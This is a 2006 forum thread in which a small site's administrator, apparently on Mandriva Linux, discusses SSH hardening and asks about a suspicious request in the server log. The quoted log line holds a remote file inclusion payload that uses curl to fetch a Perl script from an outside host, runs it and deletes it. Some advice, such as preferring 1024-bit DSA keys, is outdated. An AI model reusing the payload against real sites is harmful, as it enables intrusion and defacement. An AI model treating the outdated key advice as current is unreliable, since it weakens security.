Gowator Posted June 8, 2006 Author Share Posted June 8, 2006 OK deny hosts is now active, can someone give me a go... it would help if you try mub or something as the username so I can see its you.... Link to comment Share on other sites More sharing options...
Gowator Posted June 8, 2006 Author Share Posted June 8, 2006 200.45.94.130 - - [08/Jun/2006:20:20:58 -0400] "GET /glutenfree/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://www.freewebtown.com/carlito2711/www-data.dat?&cmd= cd%20/tmp/;curl%20-O%20http://www.freewebtown.com/carlito2711/prkl.txt; perl%20prkl.txt;rm%20-rf%20prkl.txt*? HTTP/1.0" 200 167 "-" "Mozilla/5.0" What does everyone make of this? [edited by tyme to fix URL issues] Link to comment Share on other sites More sharing options...
tyme Posted June 8, 2006 Share Posted June 8, 2006 looks like an attempt to make use of a defacing tool (see here) Link to comment Share on other sites More sharing options...
Gowator Posted June 9, 2006 Author Share Posted June 9, 2006 looks like an attempt to make use of a defacing tool (see here) Thanks tyme, Jeez, you'd think these people would have something else to do other than trying t take down a non-profit website helping people with a medical problem! However got a nice email from a company that had been cracked and was being used as a staging point so at least some good came of it. Link to comment Share on other sites More sharing options...
tyme Posted June 10, 2006 Share Posted June 10, 2006 script kiddies are everywhere, and have way too much time on their hands. Link to comment Share on other sites More sharing options...
arthur Posted June 10, 2006 Share Posted June 10, 2006 Gowator, why use a password at all? You can disable password logins in sshd, and just carry your RSA key in a USB stick, although you have to be careful with that as well. Also, security by obscurity works against the automated tools that script kiddies use. Recompile SSH to remove the version banner, and make it listen on a non-standard port, since script kiddies always check port 22. hth, Arthur Link to comment Share on other sites More sharing options...
lavaeolus Posted June 20, 2006 Share Posted June 20, 2006 I would not use rsa-keys with ssh, better use dsa-keys > ssh-keygen -d will generate a 1024-bit dsa-key for bastille not anymore included in mandriva: it seems that at least some parts went into msec, if you have direct root-login disabled in msec then you will find a file in /etc called Bastille-no-login, this is one of the remnants of mechanisms that went from bastille into msec but yes it would be nice to have a complete bastille-suite delivered with mandriva, since originally bastille was mainly developed with red hat and mandrake in mind, hey Bastille is after all french btw I found some info on their site that they are working on updates for mandriva 2006 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now